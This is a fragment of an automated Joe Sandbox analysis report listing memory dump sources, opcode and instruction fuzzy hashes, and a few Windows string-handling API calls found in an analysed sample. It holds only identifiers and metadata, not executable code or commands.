                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: db87408b1e9cadcd0a4c6ae5b6f4dd47f3337075cb2a4d2d14f0ff51d5c97f6a
                                                          • Instruction ID: e31ab10654d3133c4bbe562e0396aaf9f668a3464ceaf5ac7e335a669e1e1d03
                                                          • Opcode Fuzzy Hash: db87408b1e9cadcd0a4c6ae5b6f4dd47f3337075cb2a4d2d14f0ff51d5c97f6a
                                                          • Instruction Fuzzy Hash: 8E912371E00228CBEF28CF98C8587ADBBB1FF44305F15816AD856BB291C7785A96DF44
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 165f4b65d4ff5263617aa106d744e60dbd7c4f5d43725cc52d5e79b0d4499ef2
                                                          • Instruction ID: e0c60a541a5106e25e0a2f50f35f038ee2aa27f15edb78bccdd8f3c871378321
                                                          • Opcode Fuzzy Hash: 165f4b65d4ff5263617aa106d744e60dbd7c4f5d43725cc52d5e79b0d4499ef2
                                                          • Instruction Fuzzy Hash: 2C814471D04228DFDF24CFA8C8487ADBBB1FB45305F25816AD456BB281C7789A96CF44
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 148eda801716ed3d9969b88488a2fa3c6a7092fa608051ce9148cc038319d1b3
                                                          • Instruction ID: c1f18cc480c27d0a28c5d6dc1e8cd9b1e5e62e2ab7f78041d4dc85e199002e6a
                                                          • Opcode Fuzzy Hash: 148eda801716ed3d9969b88488a2fa3c6a7092fa608051ce9148cc038319d1b3
                                                          • Instruction Fuzzy Hash: 9B816731D04228DBDF24CFA8C8487ADBBB1FB44305F25816AD856BB2C1C7785A96DF84
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4983b507bd6312ae2b30a384a7c44b2e85aa51a10719cb6f4e73ba4d3199020d
                                                          • Instruction ID: 317a4f11872e46a6f39a96627fb546a7164eb21cb9e645d400dda74b69288846
                                                          • Opcode Fuzzy Hash: 4983b507bd6312ae2b30a384a7c44b2e85aa51a10719cb6f4e73ba4d3199020d
                                                          • Instruction Fuzzy Hash: 48713471D04228DFEF24CFA8C8447ADBBB1FB48305F15816AD856BB281C7785A96DF44
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 02494a79b55f78bffb2877069ace75a440f4ea31aa61c09e76d6a1b36594b02c
                                                          • Instruction ID: 7b464a411068ed62169f7738ff9b09ef3af2f2625e32a791141ed05019b82bd1
                                                          • Opcode Fuzzy Hash: 02494a79b55f78bffb2877069ace75a440f4ea31aa61c09e76d6a1b36594b02c
                                                          • Instruction Fuzzy Hash: A4714571E04228DFEF28CF98C8447ADBBB1FB48301F15816AD456BB281C7785996DF44
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e250f200d648af3f0bd61970bfe314c861a6b6aa0b25ddc882d3b39d553e7667
                                                          • Instruction ID: 924b227091e8338000478ad755e115b80dfeef44851b3a3b0f99ac33e872c674
                                                          • Opcode Fuzzy Hash: e250f200d648af3f0bd61970bfe314c861a6b6aa0b25ddc882d3b39d553e7667
                                                          • Instruction Fuzzy Hash: 07713571E04228DBEF28CF98C8447ADBBB1FF44305F15816AD856BB281C7785A96DF44
                                                          APIs
                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
                                                          • lstrcmpiA.KERNEL32(00405D53,00000000), ref: 00405B41
                                                          • CharNextA.USER32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B52
                                                          • lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                          • String ID:
                                                          • API String ID: 190613189-0
                                                          • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                          • Instruction ID: 19ad592fd5dcf9c9bc99336752ee576fec3eb52e2d0cc5b6bc7cc78b570e8094
                                                          • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                          • Instruction Fuzzy Hash: 5FF06231A04958AFC7129BA5DD4099FBBB8EF06350B2540A6F801F7251D674FE019BA9